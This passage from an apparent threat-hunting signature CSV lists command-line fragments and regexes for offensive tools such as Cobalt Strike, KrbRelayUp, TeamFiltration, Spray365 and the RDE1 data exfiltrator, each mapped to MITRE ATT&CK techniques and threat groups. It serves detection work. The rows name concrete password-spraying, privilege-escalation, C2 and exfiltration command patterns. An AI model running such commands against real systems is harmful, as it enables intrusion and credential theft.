Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-shares.nse*",".{0,1000}\ssnmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-software.nse*",".{0,1000}\ssnmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-users.nse*",".{0,1000}\ssnmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SOAPHound.ADWS*",".{0,1000}\sSOAPHound\.ADWS.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* SocialBox.sh*",".{0,1000}\sSocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "* socks5proxy.py*",".{0,1000}\ssocks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* socks-auth-info.nse*",".{0,1000}\ssocks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-brute.nse*",".{0,1000}\ssocks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* socks-open-proxy.nse*",".{0,1000}\ssocks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Source c:\windows\*.exe -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\.{0,1000}\.exe\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "* -Source c:\windows\system32\*.dll -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\system32\\.{0,1000}\.dll\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "* spawn C:\Windows\Temp\beacon.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\beacon\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "* spawn C:\Windows\Temp\loader.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\loader\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "* spawn -m adcs -d * -dc *",".{0,1000}\sspawn\s\-m\sadcs\s\-d\s.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* spawn -m shadowcred -d *",".{0,1000}\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* spawn.x64.c*",".{0,1000}\sspawn\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "* spawn.x64.o*",".{0,1000}\sspawn\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","420","69","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "* spawnto_x64 *",".{0,1000}\sspawnto_x64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* spawnto_x86 *",".{0,1000}\sspawnto_x86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* spellgen.py *",".{0,1000}\sspellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* spellstager.py *",".{0,1000}\sspellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* -spn cifs* -session * -clsid * -secrets*",".{0,1000}\s\-spn\scifs.{0,1000}\s\-session\s.{0,1000}\s\-clsid\s.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "* -spn cifs/* -hashes*",".{0,1000}\s\-spn\scifs\/.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -SpooferIP *",".{0,1000}\s\-SpooferIP\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --spoofppid --ppid *",".{0,1000}\s\-\-spoofppid\s\-\-ppid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "* SpoolFool *.dll",".{0,1000}\sSpoolFool\s.{0,1000}\.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* spoolsploit *",".{0,1000}\sspoolsploit\s.{0,1000}","offensive_tool_keyword","spoolsploit","A 
collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* --spray *--shuffle-users*",".{0,1000}\s\-\-spray\s.{0,1000}\-\-shuffle\-users.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* spray -ep ex-plan.s365*",".{0,1000}\sspray\s\-ep\sex\-plan\.s365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --spray --passwords *",".{0,1000}\s\-\-spray\s\-\-passwords\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --spray --push-locked --months-only --exclude *",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only\s\-\-exclude\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for 
enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --spray --push-locked --months-only*",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --spraypassword *",".{0,1000}\s\-\-spraypassword\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "* SQLITE_DATABASE=chaos*",".{0,1000}\sSQLITE_DATABASE\=chaos.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "* --sql-shell*",".{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* 
srde_arm_musl https -*",".{0,1000}\ssrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_armv7 https -*",".{0,1000}\ssrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_debug https -*",".{0,1000}\ssrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_linux https -*",".{0,1000}\ssrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_linux_aarch64 https -*",".{0,1000}\ssrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - 
TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_linux_x86_64 https -*",".{0,1000}\ssrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_macos https -*",".{0,1000}\ssrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_release https -*",".{0,1000}\ssrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_windows https -*",".{0,1000}\ssrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_windows_x64 https -*",".{0,1000}\ssrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data 
Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* srde_windows_x86 https -*",".{0,1000}\ssrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*",".{0,1000}\sSRVHOST\=127\.0\.0\.1\sSRVPORT\=4444\sRAND\=12345.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -sS -p- --min-rate=* -Pn*",".{0,1000}\s\-sS\s\-p\-\s\-\-min\-rate\=.{0,1000}\s\-Pn.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing (stealphy mode)","T1595 - T1592 